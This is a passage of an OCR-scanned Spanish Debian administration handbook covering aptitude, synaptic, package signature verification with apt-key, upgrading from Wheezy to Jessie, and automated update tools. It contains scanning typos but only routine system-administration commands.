vistas  disponibles  para  facilitar  la  navegacion  tematica.  En  todos  los  casos,  aptitude  muestra 
en  la  pantalla  una  lista  que  combina  las  categorfas  y  los  paquetes.  Las  categorias  estan  organi- 
zadas  a  traves  de  una  estructura  de  arbol  cuyas  ramas  puede  ser  desdobladas  o  cerradas  con  las 
teclas  Enter,  [  y  ].  Puede  utilizar  +  para  marcar  un  paquete  para  instalacion,  -  para  marcarlo  para 
eliminacion  y  _  para  purgarlo  (note  que  tambien  puede  utiliziar  estas  teclas  para  categorias,  en 
cuyo  caso  la  accion  correspondiente  sera  aplicada  a  todos  los  paquetes  en  dicha  categoria).  u 
actualiza  la  lista  de  paquetes  disponibles  y  Shift+u  prepara  una  actualizacion  global  al  sistema.  g 
cambia  la  vista  a  un  resumen  de  los  cambios  solicitados  (y  presione  g  nuevamente  hara  efectivos 
los  cambios),  y  q  sale  de  la  vista  actual.  Si  esta  en  la  vista  inicial,  esto  cerrara  definitivamente 
aptitude. 


DOCUMENTACION  Esta  seccion  no  cubre  los  detalles  mas  especificos  de  utilizar  aptitude,  en  general 
aptitude  se  dedica  a  darle  un  equipo  de  supervivencia  para  usarlo.  aptitude  esta  bastante 
bien  documentado  y  recomendamos  que  utilice  su  manual  completo  disponible  en 
el  paquete  aptitude-doc-en  (/usr/share/doc/aptitude/html/en/index.  html). 
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Para  buscar  un  paquete  puede  ingresar  /  seguido  de  un  patron  de  busqueda.  Este  patron  buscara 
en  los  nombres  de  los  paquetes  pero  tambien  puede  buscar  en  la  descripcion  (si  esta  precedido 
por  ~d),  la  seccion  (con  ~s)  o  a  otras  caracterfsticas  que  estan  detalladas  en  la  documentation. 
Los  mismos  patrones  pueden  utilizarse  para  filtrar  la  lista  de  paquetes  mostrados:  presione  la 
tecla  1  (como  en  limitar)  e  ingrese  el  patron. 

Administrar  la  «marca  automatica»  de  los  paquetes  Debian  (revise  la  Seccion  6.2.7,  «Seguimiento 
de  paquetes  instalados  automaticamente»  pagina  122)  es  muy  sencillo  con  aptitude.  Es  posible 
navegar  la  lista  de  paquetes  instalados  y  marcar  paquetes  como  automaticos  con  Shift+m  o  elimi- 
nar  la  marca  con  la  tecla  m.  Los  «paquetes  automaticos»  se  muestran  con  una  «A»  en  la  lista  de 
paquetes.  Esta  funcionalidad  tambien  ofrece  una  forma  simple  de  visualizar  los  paquetes  utiliza- 
dos  en  un  equipo,  sin  las  bibliotecas  y  dependencias  que  no  le  interesan.  El  patron  relacionado 
que  puede  utilizar  con  1  (para  activar  el  modo  de  filtro)  es  ~i!~M.  Especifica  que  solo  desea  ver 
paquetes  instalados  (~i)  que  no  estan  marcados  como  automaticos  (!~M). 


HERRAMIENTA  La  mayori'a  de  la  funcionalidad  de  aptitude  esta  disponible  tanto  a  traves  de  la 
Utilizando  aptitude  en  la  interfaz  interactiva  como  de  la  Ifnea  de  ordenes.  Esta  ultima  le  resultara  familiar  a 
linea  de  ordenes  l°s  usuari°s  asiduos  de  apt-get  y  apt-cache. 

Las  caracterfsticas  avanzadas  de  aptitude  tambien  estan  disponibles  en  la  Ifnea 
de  ordenes. Puede  utilizar  los  mismos  patrones  de  busqueda  de  paquetes  que  en  la 
version  interactiva.  Por  ejemplo,  si  limpiar  la  lista  de  paquetes  «instalados  manual- 
mente»  y  sabe  que  ninguno  de  los  paquetes  instalados  localmente  necesitan  una 
biblioteca  o  modulo  Perl  particular  puede  marcar  los  paquetes  correspondientes 
como  automaticos  con  una  sola  orden: 

#  aptitude  markauto  '-slibs |~sperl ' 

Aquf  puede  ver  claramente  el  poder  del  sistema  de  patrones  de  busqueda  de  apti 
tude,  que  permite  la  seleccion  instantanea  de  todos  los  paquetes  en  las  secciones 
libs  y  perl. 

Tenga  cuidado  que  si  algunos  paquetes  son  marcados  como  automaticos  y  ningun 
otro  paquete  depende  de  ellos  seran  eliminados  inmediatamente  (luego  de  un  pe- 
dido  de  confirmacion). 


Administration  de  recomendaciones,  sugerencias  y  tareas 

Otra  funcionalidad  interesante  de  aptitude  es  el  hecho  de  que  respeta  las  recomendaciones 
entre  paquetes  al  mismo  tiempo  que  provee  al  usuario  la  opcion  de  no  instalarlas  caso  por  caso. 
Por  ejemplo,  el  paquete  gnome  recomienda  gdebi  (entre  otros).  Cuando  selecciona  para  instalar 
al  primero,  el  ultimo  tambien  sera  seleccionado  (y  marcado  como  automatico  si  no  estaba  ins- 
talado  en  el  sistema).  Presionar  g  lo  hara  evidente:  gdebi  aparecera  en  la  pantalla  de  resumen 
de  acciones  pendientes  en  la  lista  de  paquetes  instalados  automaticamente  para  satisfacer  de¬ 
pendencias.  Sin  embargo,  puede  decidir  no  instalarlo  quitandolo  de  la  seleccion  de  paquetes  a 
instalar  antes  de  confirmar  las  operaciones. 

Note  que  esta  funcionalidad  de  seguimiento  de  recomendaciones  no  funciona  con  actualizacio- 
nes.  Por  ejemplo,  si  una  nueva  version  de  gnome  recomienda  un  paquete  que  no  estaba  recomen- 
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dado  en  la  version  anterior,  este  no  sera  marcado  para  instalacion.  Sin  embargo  sera  mostrado 
en  la  pantalla  de  actualizacion  para  que  el  administrador  pueda  seleccionarlo  para  instalar. 

Tambien  se  tienen  en  cuenta  las  sugerencias  entre  paquetes  pero  adaptadas  a  su  estado  especi- 
fico.  Por  ejemplo,  ya  que  gnome  sugiere  dia-gnome,  este  ultimo  sera  mostrado  en  la  pantalla  de 
resumen  de  acciones  pendientes  (en  la  seccion  de  paquetes  sugeridos  por  otros  paquetes).  De 
esta  forma  es  visto  por  el  administrador  que  puede  decidir  si  tomar  en  cuenta  la  sugerencia  o 
no.  Debido  a  que  es  solo  una  sugerencia  y  no  una  dependencia  o  recomendacion,  no  se  seleccio- 
nara  automaticamente  al  paquete  —  eso  requiere  intervencion  manual  del  usuario  (por  lo  que 
el  paquete  no  sera  marcado  como  automatico). 

En  el  mismo  espiritu,  recuerde  que  aptitude  hace  un  uso  inteligente  del  concepto  de  tarea. 
Como  se  muestran  las  tareas  como  categories  en  las  pantallas  de  listas  de  paquetes  puede  selec- 
cionar  para  instalar  o  eliminar  una  tarea  completa  o  navegar  la  lista  de  los  paquetes  incluidos 
en  una  tarea  para  seleccionar  un  subconjunto  mas  pequeno. 


Mejores  algoritmos  de  resolution 

Para  concluir  esta  seccion,  resaltaremos  que  aptitude  tiene  algoritmos  mas  elaborados  para 
resolver  situaciones  dificiles  comparado  con  apt -get.  Cuando  se  requiere  un  conjunto  de  ac¬ 
ciones  y  dicha  combinacion  de  acciones  resultaria  en  un  sistema  incoherente,  aptitude  evalua 
varios  escenarios  posibles  y  los  presenta  de  mas  a  menos  relevante.  Sin  embargo,  estos  algorit¬ 
mos  no  estan  exentos  de  fallos.  Afortunadamente  siempre  existe  la  posibilidad  de  seleccionar 
manualmente  las  acciones  a  realizar.  Cuando  las  acciones  seleccionadas  lleven  a  contradiccio- 
nes,  la  parte  superior  de  la  pantalla  mostrara  la  cantidad  de  paquetes  «rotos»  (puede  ir  directa- 
mente  a  dichos  paquetes  presionando  b).  Luego  podra  construir  manualmente  una  solucion  a 
los  problemas  encontrados.  En  particular,  puede  acceder  a  las  diferentes  versiones  disponibles 
seleccionando  el  paquete  con  Enter.  Si  la  seleccion  de  una  de  dichas  versiones  soluciona  el  pro- 
blema,  no  debe  dudar  en  utilizarla.  Cuando  reduzca  el  numero  de  paquetes  rotos  a  cero  puede 
volver  a  la  pantalla  de  resumen  de  acciones  pendientes  para  una  ultima  revision  antes  de  aplicar 
los  cambios. 


NOTA  De  forma  similar  a  dpkg,  aptitude  mantiene  una  traza  de  las  acciones  ejecutadas 
El  registro  de  aptitude  en  su  arch'vo  de  registro  (/var/log/aptitude).  Sin  embargo,  debido  a  que  los  pro- 
gramas  trabajan  en  niveles  diferentes,  no  encontrara  la  misma  informacion  en  sus 
archivos  de  registro.  Mientras  que  dpkg  registra  todas  las  operaciones  ejecutadas 
en  paquetes  individuales  paso  a  paso,  aptitude  provee  una  vision  mas  amplia  de 
operaciones  de  alto  nivel  como  una  actualizacion  de  todo  el  sistema. 

Tenga  en  cuenta  que  este  archivo  de  registro  solo  contiene  un  resumen  de  las  ope¬ 
raciones  realizadas  por  aptitude.  Si  se  utilizan  ocasionalmente  otras  interfaces  (o 
aun  dpkg  mismo),  entonces  el  registro  de  aptitude  solo  tendra  una  vista  parcial 
de  las  operaciones;  por  lo  que  no  puede  confiar  en  el  para  construir  una  historia 
confiable  del  sistema. 
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6.4.2  synaptic 


synapyic  es  un  gestor  grafico  de  paquetes  para  Debian  que  tiene  una  interfaz  grafica  limpia 
y  eficiente  basada  en  GTK+/GNOME.  Sus  muchos  filtros  listos  para  utilizar  proveen  un  acceso 
rapido  a  nuevos  paquetes  disponibles,  paquetes  instalados,  paquetes  para  actualizar,  paquetes 
obsoletos  y  mas.  Si  navega  por  estas  listas  puede  seleccionar  las  operaciones  a  realizar  en  los  pa¬ 
quetes  (instalar,  actualizar,  eliminar,  purgar);  no  se  realizan  inmediatamente  estas  operaciones 
sino  que  se  las  agrega  a  una  lista  de  tareas.  Un  boton  luego  valida  las  operaciones  y  las  ejecuta 
en  conjunto. 


Archivo  Editar  Paquete  Configuration  Ayuda 


Gestor  de  paquetes  Synaptic 


w  o 

C_4  Buscar 

Recargar  Marcar  todas  las  actualizaciones  Aplicar  Propiedades 


Todo 


Instalado 


Instalado  (manual) 
No  instalado 


Secciones 

Estado 

Origen 

Filtros 

Resultados  de  la  busqueda 
Arquitectura 


E  Paquete 

Version  instalada 

Ultima  version 

Description 

□  P  kbd 

1.15.5-2 

1.15.5-2 

Utilidades  para  las  fuentes  de  la  consola  y  t« 

keyboard-configuration 

1.123 

1.123 

system -wide  keyboard  preferences 

□  P  klibc-utils 

2. 0.4-2 

2. 0.4-2 

Pequefias  utilidades  generadas  con  klibc  par; 

□  P  kmod 

18-3 

18-3 

tools  for  managing  Linux  kernel  modules 

ED  P  krb  5-locales 

1.12.1+dfsg-19+d  1.12.1+dfsg-19+d  Internationalization  support  for  MIT  Kerbero: 

□  P  less 

458-3 

458-3 

pager  program  similar  to  more 

system-wide  keyboard  preferences  P 

|  Obtener  captura  de  pantalla 

Obtener  registro  de  cambios 

This  package  maintains  the  keyboard  preferences  in 
/etc/default/keyboard.  Other  packages  can  use  the  information 
provided  by  this  package  in  order  to  configure  the  keyboard  on  the 
console  or  in  X  Window. 


1748  paquetes  listados,  1748  instalados,  0  rotos.  5  para  instalar/actualizar,  1  para  desinstalar;  se  usaran  38,8  MB 


Figura  6.2  gestor  de  paquetes  synaptic 


6.5.  Comprobacion  de  la  autenticidad  de  un  paquete 

La  seguridad  es  muy  importante  para  los  administradores  de  Falcot  Corp.  Por  consiguiente,  ne- 
cesitan  asegurar  que  solo  instalen  paquetes  con  garantia  de  que  provienen  de  Debian  sin  modi- 
ficaciones  en  el  camino.  Un  «cracker»  podrfa  intentar  agregar  codigo  malicioso  en  un  paquete 
que  de  otra  forma  seria  legitimo.  Si  se  instala  tal  paquete,  este  podrfa  hacer  cualquier  cosa  para 
la  que  dicho  «cracker»  lo  diseno,  inclusive  revelar  contraseiias  o  informacion  confidencial  por 
ejemplo.  Para  evitar  este  riesgo,  Debian  provee  un  sello  contra  modificaciones  para  garantizar 
—  al  momento  de  instalacion  —  que  el  paquete  realmente  proviene  de  su  encargado  oficial  y  no 
fue  modificado  por  un  tercero. 

El  sello  funciona  con  una  firmay  una  cadena  de  «hashes»  criptograficos.  El  archivo  Release,  pro- 
visto  por  las  replicas  Debian,  es  el  firmado.  Contiene  una  lista  de  los  archivos  Packages  (inclu- 
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yendo  sus  formas  comprimidas,  Packages  .  gz  y  Packages  .xz,  asf  como  las  versiones  incremen- 
tales),  junto  con  sus  «hashes»  MD5,  SHA1  y  SHA256  lo  que  asegura  que  los  archivos  no  fueron 
modificados.  Estos  archivos  Packages  contienen una lista  de  los  paquetes  Debian  disponibles  en 
la  replica  junto  con  sus  hashes  lo  que  asegura,  a  su  vez,  que  el  contenido  de  los  paquetes  mismos 
tampoco  fue  modificado. 

Las  Haves  confiables  son  administradas  con  el  programa  apt  -  key  que  se  encuentra  en  el  paque- 
te  apt.  Este  programa  mantiene  un  conjunto  de  Haves  publicas  GnuPG  que  son  utilizadas  para 
verificar  las  firmas  disponibles  en  los  archivos  Release. gpg  disponibles  en  las  replicas.  Puede 
utilizarse  para  agregar  nuevas  Haves  de  forma  manual  (cuando  se  necesitan  replicas  no  oficia- 
les).  Generalmente  sin  embargo,  solo  necesitara  las  Haves  oficiales  de  Debian.  Estas  Haves  se 
mantienen  actualizadas  de  forma  automatica  por  el  paquete  debian-archive-keyring  (que  crea  los 
conjuntos  de  Haves  correspondientes  en  /etc/apt/t rusted  .gpg  .d).  Sin  embargo,  la  primera 
instalacion  de  este  paquete  requiere  cierto  cuidado:  aun  si  el  paquete  esta  firmado  como  cual- 
quier  otro,  no  se  puede  verificar  dicha  firma.  Los  administradores  cautelosos  deberian,  por  lo 
tanto,  verificar  las  huellas  de  las  Haves  importadas  antes  de  confiar  en  ellas  para  instalar  nuevos 
paquetes: 

#  apt-key  fingerprint 

/etc/apt/t rusted . gpg . d/debian-archive- jess ie- automatic .gpg 

pub  4096R/2B9OD010  2014-11-21  [expires:  2022-11-19] 

Key  fingerprint  =  126C  0D24  BD8A  2942  CC7D  F8AC  7638  D044  2B90  D010 
uid  Debian  Archive  Automatic  Signing  Key  (8/jessie)  <ftpmaster@debian . org> 

/etc/apt/t rusted . gpg . d/debian -  a rchive - j ess ie- security -automatic . gpg 

pub  4096R/C857C906  2014-11-21  [expires:  2022-11-19] 

Key  fingerprint  =  D211  6914  1CEC  D440  F2EB  8DDA  9D6D  8F6B  C857  C906 
uid  Debian  Security  Archive  Automatic  Signing  Key  (8/jessie)  <ftpmaster@debian . org> 

/etc/apt/t rusted . gpg . d/debian -a rchive- jess ie- stable. gpg 

pub  4096R/518E17E1  2013-08-17  [expires:  2021-08-15] 

Key  fingerprint  =  75DD  C3C4  A499  F1A1  8CB5  F3C8  CBF8  D6FD  518E  17E1 
uid  Jessie  Stable  Release  Key  <debian- release@lists . debian . org> 

/etc/apt/t rusted . gpg . d/debian -a rchive -squeeze -automatic . gpg 

pub  4096R/473041FA  2010-08-27  [expires:  2018-03-05] 

Key  fingerprint  =  9FED  2BCB  DCD2  9CDF  7626  78CB  AED4  B06F  4730  41FA 
uid  Debian  Archive  Automatic  Signing  Key  (6.0/squeeze)  <ftpmaster@debian . org> 

/etc/apt/t rusted . gpg . d/debian -a rchive- squeeze -stable .gpg 

pub  4096R/B98321F9  2010-08-07  [expires:  2017-08-05] 

Key  fingerprint  =  0E4E  DE2C  7F3E  1FC0  D033  800E  6448  1591  B983  21F9 

uid  Squeeze  Stable  Release  Key  <debian- release@lists . debian . org> 

/etc/apt/t rusted . gpg . d/debian -a rchive -wheezy -automatic .gpg 

pub  4096R/46925553  2012-04-27  [expires:  2020-04-25] 

Key  fingerprint  =  A1BD  8E9D  78F7  FE5C  3E65  D8AF  8B48  AD62  4692  5553 
uid  Debian  Archive  Automatic  Signing  Key  (7.0/wheezy)  <ftpmaster@debian . org> 

/etc/apt/t rusted . gpg . d/debian -a rchive -wheezy -stable. gpg 

pub  4096R/65FFB764  2012-05-08  [expires:  2019-05-07] 

Key  fingerprint  =  ED6D  6527  1AAC  F0FF  15D1  2303  6FB2  A1C2  65FF  B764 

uid  Wheezy  Stable  Release  Key  <debian- release@lists . debian . org> 
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EN  LA  PRACTICA  Cuando  se  agrega  una  fuente  de  paquetes  de  terceros  al  archivo  sources .  list, 
Agregando  Haves  se  neces'ta  informar  a  APT  que  confie  en  las  [laves  de  autenticacion  GPG  corres- 

confiables  pondientes  (de  lo  contrario  continuara  quejandose  de  que  no  puede  asegurar  la 

autenticidad  de  los  paquetes  que  provengan  de  dicho  repositorio).  El  primer  paso 
es,  obviamente,  obtener  la  Nave  publica.  La  mayoria  de  las  veces  encontrara  dicha 
Have  en  un  pequeno  archivo  de  texto,  que  llamaremos  key.asc  en  los  siguientes 
ejemplos. 

Para  agregar  la  Have  al  conjunto  confiable,  el  administrador  puede  ejecutar  apt- 
key  add  <  key .  asc.  Otra  forma  es  utilizar  la  interfaz  grafica  synaptic:  su  pesta- 
na  «Autenticacion»  en  el  menu  Configuracion  — >  Repositories  provee  la  capacidad 
de  importar  una  Have  del  archivo  key.asc. 

Aquellos  que  prefieren  una  aplicacion  dedicada  y  mas  detalles  sobre  las  Haves  con- 
fiables  pueden  utilizar  gui-apt-key  (en  el  paquete  con  el  mismo  nombre),  una 
pequena  interfaz  grafica  para  el  usuario  que  administra  el  conjunto  de  Haves  con- 
fiables. 


Una  vez  que  las  Haves  apropiadas  se  ecuentran  en  el  conjunto,  APT  revisara  las  firmas  antes  de 
cualquier  operacion  riesgosa  para  que  las  interfaces  muestren  una  advertencia  cuando  esten 
instalando  un  paquete  sobre  el  que  no  se  puede  verificar  autenticidad. 


6.6.  Actualization  de  una  distribucion  estable  a  la  siguiente 

Una  de  las  caracteristicas  mas  conocidas  de  Debian  es  su  habilidad  de  actualizar  un  sistema  insta- 
lado  de  una  version  estable  a  la  siguiente:  «dist-upgrade»  —  una  frase  muy  conocida  —  contribuyo 
en  gran  medida  a  la  reputacion  del  proyecto.  Tomando  unas  pocas  precauciones,  actualizar  un 
equipo  puede  tomar  tan  poco  como  unos  cuantos  minutos,  o  unas  docenas  de  minutos,  depen- 
diendo  de  la  velocidad  de  descarga  de  los  repositorios  de  paquetes. 


6.6.1  Procedimiento  recomendado 

Dado  que  Debian  tiene  bastante  tiempo  para  evolucionar  entre  versiones  estables  deberia  leer 
las  notas  de  publicacion  antes  de  actualizar. 

VOLVER  A  LOS  CIMIENTOS  Las  notas  de  publicacion  para  un  sistema  operativo  (y,  mas  generalmente,  para 
Notas  de  publicacion  cualquier  software)  son  un  documento  que  provee  una  vista  general  del  software 
con  algunos  detalles  sobre  las  particularidades  de  una  version.  Estos  documentos 
son  generalmente  cortos  comparados  con  la  documentacion  completa  y  frecuen- 
temente  listan  las  caracteristicas  introducidas  desde  la  version  anterior.  Tambien 
proveen  detalles  sobre  los  procedimientos  de  actualizacion,  advertencias  para  los 
usuarios  de  las  versiones  anteriores  y,  a  veces,  una  errata. 

Las  notas  de  publicacion  estan  disponibles  online:  las  de  la  version  estable  actual 
tienen  una  URL  dedicada  mientras  que  se  pueden  encontrar  las  anteriores  segun 
sus  nombre  clave: 

http : //www. debian . org/ releases/ stable/ releasenotes 
•-  http : //www. debian . org/ releases/wheeze/ releasenotes 
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En  esta  seccion  nos  centraremos  en  actualizar  un  sistema  Wheezy  a Jeesie.  Esta  es  una  operacion 
de  gran  envergadura  en  un  sistema;  Como  tal,  nunca  esta  100  %  libre  de  riesgos  y  no  deberfa 
intentarse  antes  de  tener  copias  de  respaldo  de  todos  los  datos  importantes. 

Otro  buen  habito  que  haria  la  actualization  mas  sencilla  (y  mas  corta)  es  ordenar  sus  paquetes 
instalados  y  solo  mantener  aquellos  que  son  realmente  necesarios.  Las  herramientas  utiles  para 
realizarlo  incluyen  aptitude,  deborphan  y  debfoster  (revise  la  Seccion  6.2.7,  «Seguimiento 
de  paquetes  instalados  automaticamente»  pagina  122).  Por  ejemplo,  puede  utilizar  la  siguiente 
ordeny  luego  utilizar  el  modo  interactive  de  aptitude  para  revisar  y  retocar  las  eliminaciones 
programadas: 

#  deborphan  |  xargs  aptitude  --schedule-only  remove 

Ahora  la  actualization  en  si.  Primero  necesita  cambiar  el  archivo  /etc/apt/sources  .  list  para 
indicarle  a  APT  que  obtenga  sus  paquetes  de  Jeesie  en  lugar  de  Wheezy.  Si  el  archivo  solo  contiene 
referencias  a  Stable  en  lugar  de  nombres  codigo  explicitos  no  necesita  hacer  este  cambio  ya  que 
Stable  siempre  hace  referencia  a  la  ultima  version  de  Debian  publicada.  En  ambos  casos,  necesita 
actualizar  la  base  de  datos  de  paquetes  disponibles  (con  apt  u pd a te  o  el  boton  de  actualization 
en  synaptic). 

Una  vez  que  se  registraron  las  nuevas  fuentes  de  paquetes,  primero  debe  realizar  una  actualiza¬ 
tion  minima  con  apt  upg  rade.  El  realizar  la  actualization  en  dos  pasos  facilitara  el  trabajo  de 
las  herramientas  de  gestion  de  paquetes  y  generalmente  asegurara  que  tendra  las  ultimas  versio- 
nes  de  las  mismas,  que  pueden  haber  acumulado  correcciones  de  errores  y  mejoras  necesarias 
para  finalizar  la  actualization  de  la  distribution  completa. 

Una  vez  que  se  completa  la  pimera  actualization,  llega  el  momento  de  la  actualization  en  si.  Ya 
sea  con  apt  full -upg  rade,  aptitude>  o  synaptic.  Deberia  verificar  cuidadosamente  las  ac- 
ciones  sugeridas  antes  de  ejecutarlas:  podria  desear  agregar  paquetes  sugeridos  o  deseleccionar 
paquetes  que  solo  son  recomendados  y  sabe  que  no  seran  utiles.  En  cualquier  caso,  la  interfaz 
deberia  proveer  un  escenario  que  termine  con  un  sistema  Jeesie  coherente  y  actualizado.  Luego, 
todo  lo  que  necesita  hacer  es  esperar  mientras  se  descargan  los  paquetes  necesarios,  responder 
las  preguntas  Debconf  y  posiblemente  aquellas  sobre  archivos  de  configuration  modificados  lo- 
calmente  y  sentarse  a  esperar  mientras  APT  hace  su  magia. 


6.6.2  Manejo  de  problemas  tras  una  actualization 

A  pesar  de  los  mejores  esfuerzos  de  los  encargados  de  Debian,  una  actualization  general  del 
sistema  no  es  siempre  tan  fluida  como  uno  desearia.  Nuevas  versiones  de  software  podrian  ser 
incompatibles  con  las  anteriores  (por  ejemplo,  podrian  haber  cambiado  sus  comportamientos 
predeterminados  o  sus  formatos  de  datos).  Tambien,  se  pueden  haber  colado  algunos  errores  a 
pesar  de  la  fase  de  pruebas  que  precede  a  una  publication  de  Debian. 

Para  anticiparse  a  algunos  de  estos  problemas,  puede  instalar  el  paquete  apt-listchanges  que 
muestra  information  acerca  de  posibles  problemas  al  prinicipio  de  la  actualization  de  un  pa¬ 
quete.  Los  encargados  de  los  paquetes  recopilan  esta  informacion  y  la  incorporan  a  los  archivos 
/us r/share/doc/paquete/NEWS.  Debian  para  el  beneficio  de  los  usuarios.  Leer  estos  archivos 
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(posiblemente  a  traves  de  apt-listchanges )  deberfa  ayudarle  a  evitar  sorpresas  desagradables. 

A  veces  podrfa  encontrar  que  la  nueva  version  de  un  software  no  funciona  en  absoluto.  Esto 
generalmente  ocurre  si  la  aplicacion  no  es  popular  o  no  fue  probada  lo  suficiente;  una  actualiza¬ 
tion  de  ultimo  momento  tambien  podrfa  introducir  regresiones  que  se  encuentran  solo  luego  de 
la  publicacion  estable.  En  ambos  casos,  lo  primero  a  hacer  es  revisar  el  sistema  de  seguimiento 
de  errores  en  http://bugs.debian.org/pnquefe  y  verificar  si  el  problema  ya  fue  reportado.  Si  no 
lo  fue,  deberfa  reportarlo  con  reportbug.  Si  ya  es  conocido,  tanto  el  reporte  de  error  como  los 
mensajes  asociados  suelen  ser  exelentes  fuentes  de  informacion  sobre  el  problema: 

■  a  veces  existe  un  parche  y  esta  disponible  en  el  reporte  de  error,  puede  recompilar  local- 
mente  una  version  corregida  del  paquete  roto  (revise  la  Seccion  15.1,  «Recompilacion  de 
un  paquete  desde  sus  fuentes»  pagina  446); 

■  en  otros  casos,  los  usuarios  podrfan  haber  encontrado  una  forma  de  evitar  el  problema  y 
compartido  sus  experiencias  en  sus  respuestas  al  reporte; 

■  en  otros  casos  mas,  puede  que  el  encargado  ya  haya  preparado  y  publicado  un  paquete 
corregido. 

Dependiendo  de  la  severidad  del  error,  se  podrfa  llegar  a  preparar  una  nueva  version  del  paquete 
especfficamente  para  una  nueva  revision  de  la  version  estable.  Cuando  esto  sucede,  el  paquete 
corregido  estara  disponible  en  la  seccion  proposed-updates  de  las  replicas  de  Debian  (revise 
la  Seccion  6.1.2.3,  «Actualizaciones  propuestas»  pagina  109).  Puede  agregar  temporalmente  la 
lfnea  correspondiente  al  archivo  sources .  list  e  instalar  los  paquetes  actualizados  con  apt  o 
aptitude. 

A  veces  el  paquete  corregido  no  esta  disponible  en  esta  seccion  porque  esta  pendiente  de  valida- 
cion  por  parte  de  los  Gestores  de  versiones  estables.  Puede  verificar  si  este  es  el  caso  en  su  pagina 
web.  Los  paquetes  allf  listados  aun  no  estan  disponibles,  pero  al  menos  sabe  que  el  proceso  de 
publicacion  esta  en  marcha. 

http : // release . debian . org/proposed- updates/ stable . html 


6.7.  Manutencion  de  un  sistema  actualizado 

La  distribucion  Debian  es  dinamica  y  cambia  continuamente.  La  mayorfa  de  los  cambios  tienen 
lugar  en  las  versiones  Testing  y  Unstable,  pero  incluso  Stable  es  actualizada  de  vez  en  cuando,  prin- 
cipalmente  para  correcciones  relacionadas  con  la  seguridad.  Independientemente  de  la  version 
de  Debian  que  ejecute  en  el  sistema,  generalmente  es  buena  idea  mantenerlo  actualizado  para 
poder  beneficiarse  de  las  evoluciones  recientes  y  correcciones  de  errores. 

Si  bien  es  posible  ejecutar  periodicamente  una  herramienta  para  verificar  las  actualizaciones  dis¬ 
ponibles  y  aplicarlas,  una  tarea  tan  repetitiva  es  tediosa,  especialmente  cuando  debe  realizarla 
en  varias  maquinas.  Afortunadamente,  como  varias  tareas  repetitivas,  puede  ser  automatizada 
parcialmente  y  ya  se  desarrollaron  un  conjunto  de  herramientas  a  tal  efecto. 

La  primera  de  estas  herramientas  es  aptic  ron  en  el  paquete  del  mismo  nombre.  Su  efecto  prin¬ 
cipal  es  ejecutar  diariamente  un  script  (a  traves  de  c  ron).  El  script  actualiza  la  lista  de  paquetes 
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y,  si  algunos  paquetes  instalados  no  estan  en  la  ultima  version  disponible,  envia  un  email  con 
una  lista  de  estos  paquetes  junto  con  los  cambios  realizados  en  las  nuevas  versiones.  Obviamen- 
te,  este  paquete  esta  apuntado  principalmente  a  usuarios  de  Debian  Stable  ya  que  los  emails 
diarios  serian  muy  extensos  para  las  versiones  de  Debian  con  mas  actualizaciones.  Cuando  ha- 
ya  actualizaciones  disponibles,  aptic  ron  las  descargara  automaticamente.  No  las  instalara  —  el 
administrador  lo  hara  —  pero  tener  los  paquetes  ya  descargados  y  disponibles  localmente  (en  el 
cache  de  APT)  hace  mas  rapido  el  trabajo. 

Los  administradores  a  cargo  de  varios  equipos  seguramente  apreciaran  ser  informados  de  actua¬ 
lizaciones  pendientes,  pero  las  actualizaciones  en  si  aun  son  tan  tediosas  como  solian  serlo.  Aqui 
es  donde  es  util  el  script  /etc/c ron. daily/apt  (del  paquete  apt),  cron  tambien  ejecuta  este 
script  diariamente  (sin  interaccion  del  usuario).  Para  controlar  su  comportamiento,  utilice  varia¬ 
bles  de  configuracion  de  APT  (que  son,  por  lo  tanto,  almacenadas  bajo  /etc/apt/apt .  conf  .d/). 
Las  variables  principales  son: 

APT::Periodic::Update-Package-Lists  Esta  opcion  le  permite  especificar  la  frecuencia  (en 
dias)  con  la  que  se  actualizara  las  listas  de  paquetes.  Los  usuarios  de  aptic  ron  pueden 
hacerlo  sin  esta  variable  ya  que  aptic  ron  se  encarga  de  esta  tarea. 

APT::Periodic::Download-Upgradeable-Packages  Nuevamente,  esta  opcion  indica  la 
frecuencia  (en  dias)  pero  para  descargar  los  paquetes  en  si  en  este  caso.  Otra  vez,  los  usua¬ 
rios  de  aptic  ron  no  lo  necesitaran. 

APT::Periodic::AutocleanInterval  Esta  opcion  cubre  una  funcionalidad  que  apticron  no 
tiene.  Controla  cuan  seguido  se  eliminan  paquetes  obsoletos  (aquellos  a  los  que  ya  ningu- 
na  distribucion  hace  referencia)  del  cache  de  APT.  Esto  mantiene  el  cache  de  APT  de  un 
tamano  razonable  y  significa  que  no  necesitara  preocuparse  por  esa  tarea. 

APT ::Periodic::Unattended-Upgrade  Cuando  esta  opcion  esta  activa,  el  script  diario  ejecu- 
tara  unattended -upgrade  (del  paquete  unattended-upgrades )  que,  como  sugiere  su  nom- 
bre,  puede  automatizar  al  proceso  de  actualizacion  para  algunos  paquetes  (de  forma 
predeterminada  solo  realiza  actualizaciones  de  seguridad,  pero  puede  personalizarlo  en 
/etc/apt/apt .  conf  .d/50unattended- upgrades).  Tenga  en  cuenta  que  puede  definir 
esta  opcion  con  la  ayuda  de  debconf  si  ejecuta  dpkg-  reconfigure  -plow  unattended  - 
upgrades. 

Otras  opciones  le  permiten  controlar  el  comportamiento  de  la  limpieza  del  cache  con  mas  pre¬ 
cision.  No  estan  listadas  aqui  pero  son  descriptas  en  el  script  /etc/cron .  daily/apt. 

Estas  herramientas  funcionan  muy  bien  para  servidores,  pero  los  usuarios  de  maquinas  de  escri- 
torio  generalmente  prefieren  un  sistema  mas  interactivo.Por  ese  motvo  la  tarea  «Entorno  gra- 
fico  de  escritorio  Debian»  instala  gnome-packagekit  (al  menos,  cuando  selecciona  GNOME  como 
entorno  de  escritorio).  Esta  muestra  un  icono  en  el  area  de  notificacion  de  los  entornos  de  es¬ 
critorio  cuando  hay  actualizaciones  disponibles;  pulsar  este  icono  ejecuta  gpk-  update- viewer, 
una  interfaz  simplificada  para  realizar  actualizaciones.  Puede  navegar  a  traves  de  las  actualiza¬ 
ciones  disponibles,  leer  la  descripcion  de  los  paquetes  relevantes  y  sus  archivos  changelog  y 
seleccionar  si  aplicar  la  actualizacion  o  no  caso  por  caso. 
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Hay  1569  actualizaciones  disponibles 

Las  actualizaciones  de  paquetes  corrigen  errores,  eliminan  vulnerabilidades  de  seguridad  y 
proporcionan  nuevas  funcionalidades. 


Otras  actualizaciones 

query  and  manipulate  user  account  information 
accountsservice-0.6.40-3  (32  bits) 

Utilidades  de  listas  de  control  de  acceso 
acl-2.2.52-3  (32  bits) 

Guiones  para  manejar  eventos  basicos  de  ACPI,  tales  como  el  boton  de  encendido 
acpi-support-base-0.142-8 

